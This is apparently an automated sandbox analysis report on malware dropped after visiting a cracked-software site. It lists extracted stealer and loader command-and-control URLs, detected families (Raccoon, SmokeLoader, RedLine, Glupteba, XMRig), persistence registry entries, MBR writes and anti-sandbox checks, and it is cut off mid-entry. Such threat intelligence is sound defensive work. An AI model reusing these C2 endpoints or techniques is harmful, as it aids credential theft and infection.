Analysis
-
max time kernel
200s -
max time network
378s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-02-2021 12:53
Static task
static1
URLScan task
urlscan1
Sample
https://cracknet.net/
Behavioral task
behavioral1
Sample
https://cracknet.net/
Resource
win10v20201028
Errors
General
-
Target
https://cracknet.net/
-
Sample
210213-nbwz5vbpyn
Malware Config
Extracted
raccoon
8a5ae6012868ca42851ee67a7adea59c46a3fb6d
-
url4cnc
https://telete.in/jdiavolenok23
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
Extracted
raccoon
17694a35d42ac97e2cd3ebd196db01b372cce1b0
-
url4cnc
https://telete.in/o23felk0s
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
metasploit
windows/single_exec
Extracted
raccoon
027bc1bb9168079d5f7473eee9c05ee06589c305
-
url4cnc
https://telete.in/jjbadb0y
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/8724-771-0x0000000001520000-0x0000000001D22000-memory.dmp family_glupteba behavioral1/memory/8724-772-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral1/memory/8724-773-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/7260-644-0x0000000002290000-0x00000000022BE000-memory.dmp family_redline behavioral1/memory/7260-648-0x0000000002500000-0x000000000252C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/7284-946-0x0000000002D40000-0x0000000002E31000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 48 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exekey.exeA9E8.tmp.exe6489A2274AE24900.exe6489A2274AE24900.exemd2_2efs.exe1613221200584.exefile.exeE309.tmp.exe1613221205193.exeBTRSetp.exeinstaller.exeE309.tmp.exe5074078.552817902.303445854.371613221211146.exeWindows Host.exegdrrr.exejfiag3g_gg.exejfiag3g_gg.exekeygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exe4695.tmp.exeThunderFW.exemd2_2efs.exekeygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exeMiniThunderPlatform.exefile.exe71AD.tmp.exekeygen-step-2.exepid process 4264 keygen-pr.exe 4576 keygen-step-1.exe 2372 keygen-step-2.exe 836 keygen-step-3.exe 1520 keygen-step-4.exe 4956 key.exe 4816 Setup.exe 224 key.exe 3316 A9E8.tmp.exe 1768 6489A2274AE24900.exe 2948 6489A2274AE24900.exe 1756 md2_2efs.exe 4708 1613221200584.exe 4344 file.exe 4888 E309.tmp.exe 936 1613221205193.exe 4496 BTRSetp.exe 4612 installer.exe 4216 E309.tmp.exe 1636 5074078.55 3680 2817902.30 4332 3445854.37 3824 1613221211146.exe 4068 Windows Host.exe 4672 gdrrr.exe 4552 jfiag3g_gg.exe 1736 jfiag3g_gg.exe 5080 keygen-pr.exe 2884 keygen-step-1.exe 2848 keygen-step-2.exe 4916 keygen-step-3.exe 3340 keygen-step-4.exe 4980 key.exe 2240 Setup.exe 4248 4695.tmp.exe 2452 ThunderFW.exe 4328 md2_2efs.exe 3216 keygen-pr.exe 2436 keygen-step-1.exe 4360 keygen-step-2.exe 5164 keygen-step-3.exe 5308 keygen-step-4.exe 5496 key.exe 5520 Setup.exe 5676 MiniThunderPlatform.exe 5768 file.exe 5848 71AD.tmp.exe 5876 keygen-step-2.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule behavioral1/memory/7948-830-0x0000000004000000-0x0000000004001000-memory.dmp upx behavioral1/memory/5736-992-0x0000000000400000-0x00000000047FC000-memory.dmp upx behavioral1/memory/5736-1000-0x0000000000400000-0x00000000047FC000-memory.dmp upx -
Processes:
resource yara_rule behavioral1/memory/8928-1031-0x0000000000180000-0x0000000000B99000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
3445854.37description ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3445854.37 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3445854.37 -
Loads dropped DLL 23 IoCs
Processes:
MsiExec.exeA9E8.tmp.exeMsiExec.exe4695.tmp.exe6489A2274AE24900.exeMiniThunderPlatform.exepid process 4600 MsiExec.exe 3316 A9E8.tmp.exe 3316 A9E8.tmp.exe 3316 A9E8.tmp.exe 3316 A9E8.tmp.exe 3316 A9E8.tmp.exe 3316 A9E8.tmp.exe 5008 MsiExec.exe 4248 4695.tmp.exe 4248 4695.tmp.exe 4248 4695.tmp.exe 4248 4695.tmp.exe 4248 4695.tmp.exe 4248 4695.tmp.exe 1768 6489A2274AE24900.exe 1768 6489A2274AE24900.exe 5676 MiniThunderPlatform.exe 5676 MiniThunderPlatform.exe 5676 MiniThunderPlatform.exe 5676 MiniThunderPlatform.exe 5676 MiniThunderPlatform.exe 5676 MiniThunderPlatform.exe 5676 MiniThunderPlatform.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/4332-365-0x0000000000170000-0x0000000000171000-memory.dmp themida behavioral1/memory/6268-478-0x0000000001040000-0x0000000001041000-memory.dmp themida behavioral1/memory/7280-602-0x00000000003C0000-0x00000000003C1000-memory.dmp themida behavioral1/memory/4580-710-0x0000000000FF0000-0x0000000000FF1000-memory.dmp themida behavioral1/memory/8672-755-0x0000000000FD0000-0x0000000000FD1000-memory.dmp themida behavioral1/memory/8344-806-0x0000000000C80000-0x0000000000C81000-memory.dmp themida behavioral1/memory/7816-959-0x0000000000DD0000-0x0000000000DD1000-memory.dmp themida behavioral1/memory/4704-987-0x0000000000BB0000-0x0000000000BB1000-memory.dmp themida behavioral1/memory/8928-1031-0x0000000000180000-0x0000000000B99000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
gdrrr.exe2817902.30description ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gdrrr.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 2817902.30 -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Setup.exe6489A2274AE24900.exe6489A2274AE24900.exemd2_2efs.exe3445854.37Setup.exemd2_2efs.exeSetup.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3445854.37 Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe -
Drops Chrome extension 1 IoCs
Processes:
6489A2274AE24900.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\mobjnlkohipjcfcklielmmlilnolhlef\1.0.0.0_0\manifest.json 6489A2274AE24900.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 354 api.2ip.ua 357 api.2ip.ua 145 api.ipify.org 155 ip-api.com 313 api.ipify.org 460 api.ipify.org 281 api.ipify.org 400 api.ipify.org 448 api.2ip.ua -
Writes to the Master Boot Record (MBR) 1 TTPs 6 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
Setup.exeMiniThunderPlatform.exeSetup.exeSetup.exe6489A2274AE24900.exe6489A2274AE24900.exedescription ioc process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 6489A2274AE24900.exe File opened for modification \??\PhysicalDrive0 6489A2274AE24900.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
Setup.exe3445854.37Setup.exepid process 4816 Setup.exe 4332 3445854.37 2240 Setup.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
key.exe6489A2274AE24900.exeE309.tmp.exekeygen-step-2.exedescription pid process target process PID 4956 set thread context of 224 4956 key.exe key.exe PID 1768 set thread context of 1868 1768 6489A2274AE24900.exe firefox.exe PID 1768 set thread context of 4444 1768 6489A2274AE24900.exe firefox.exe PID 4888 set thread context of 4216 4888 E309.tmp.exe E309.tmp.exe PID 1768 set thread context of 2452 1768 6489A2274AE24900.exe firefox.exe PID 4360 set thread context of 5876 4360 keygen-step-2.exe keygen-step-2.exe -
Drops file in Program Files directory 3 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files (x86)\gdiview\gdiview\readme.txt msiexec.exe File created C:\Program Files (x86)\gdiview\gdiview\GDIView.chm msiexec.exe File created C:\Program Files (x86)\gdiview\gdiview\GDIView.exe msiexec.exe -
Drops file in Windows directory 9 IoCs
Processes:
msiexec.exeWerFault.exedescription ioc process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{9A2A452C-3057-4F5E-8C7F-41B0D566B831} msiexec.exe File created C:\Windows\Installer\f7758c8.msi msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\Installer\f7758c6.msi msiexec.exe File opened for modification C:\Windows\Installer\f7758c6.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI5CEC.tmp msiexec.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 15 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1584 1756 WerFault.exe md2_2efs.exe 4768 1636 WerFault.exe 5074078.55 4192 4328 WerFault.exe md2_2efs.exe 6216 1228 WerFault.exe 999166.10 5616 1244 WerFault.exe md2_2efs.exe 5384 6244 WerFault.exe md2_2efs.exe 5564 7056 WerFault.exe md2_2efs.exe 7480 5568 WerFault.exe md2_2efs.exe 4592 7680 WerFault.exe md2_2efs.exe 7248 188 WerFault.exe 7154320.78 7776 6524 WerFault.exe 6137021.67 5516 7860 WerFault.exe 3933288.43 7948 7584 WerFault.exe 9090.exe 5404 4212 WerFault.exe md2_2efs.exe 5412 8404 WerFault.exe 5624724.61 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
6489A2274AE24900.exe6489A2274AE24900.exesvchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened 